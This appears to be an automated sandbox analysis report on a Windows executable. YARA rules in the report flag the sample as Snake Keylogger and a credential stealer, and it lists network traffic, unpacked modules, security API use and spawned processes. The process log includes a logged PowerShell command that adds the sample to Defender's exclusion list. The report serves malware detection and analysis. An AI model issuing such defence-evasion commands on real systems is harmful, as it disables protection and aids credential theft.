                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49789 version: TLS 1.2
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0272D3C40_2_0272D3C4
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0D752AA80_2_0D752AA8
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159C1466_2_0159C146
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_015971186_2_01597118
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159A0886_2_0159A088
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_015953626_2_01595362
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159D2786_2_0159D278
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159C4686_2_0159C468
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159C7386_2_0159C738
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159F9796_2_0159F979
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159E9886_2_0159E988
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_015969A06_2_015969A0
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_01593B956_2_01593B95
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159CA086_2_0159CA08
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159CCD86_2_0159CCD8
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159CFAA6_2_0159CFAA
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_01593E096_2_01593E09
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_0159E97A6_2_0159E97A
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_015929EC6_2_015929EC
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_01593AA16_2_01593AA1
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F0AFD06_2_06F0AFD0
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F0DE4B6_2_06F0DE4B
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F04A006_2_06F04A00
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2222946513.0000000004EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.0000000003FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.00000000037A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2217732877.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2224357867.0000000009B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2216276435.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000000.2167338827.0000000000342000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHQYI.exeH vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4630511383.0000000007319000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exeBinary or memory string: OriginalFilenameHQYI.exeH vs 299371485_14108825808_1736351479899.exe
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, -J--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, -J--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, -J--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, -J--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, .csBase64 encoded string: 'IAt1Sn9WWSxyQHsKau5SKWhFtGEX/6MJmf4asP6NIqmXal3SCVqCJZYVBBPIh0Bh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, .csBase64 encoded string: 'IAt1Sn9WWSxyQHsKau5SKWhFtGEX/6MJmf4asP6NIqmXal3SCVqCJZYVBBPIh0Bh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\299371485_14108825808_1736351479899.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMutant created: \Sessions\1\BaseNamedObjects\hLvhfhxxgZpuoaCiTzlPTGdGpE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j20hxsiw.zge.ps1Jump to behavior
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 299371485_14108825808_1736351479899.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 299371485_14108825808_1736351479899.exeVirustotal: Detection: 29%
                    Source: 299371485_14108825808_1736351479899.exeReversingLabs: Detection: 21%
                    Source: unknownProcess created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: netutils.dllJump to behavior
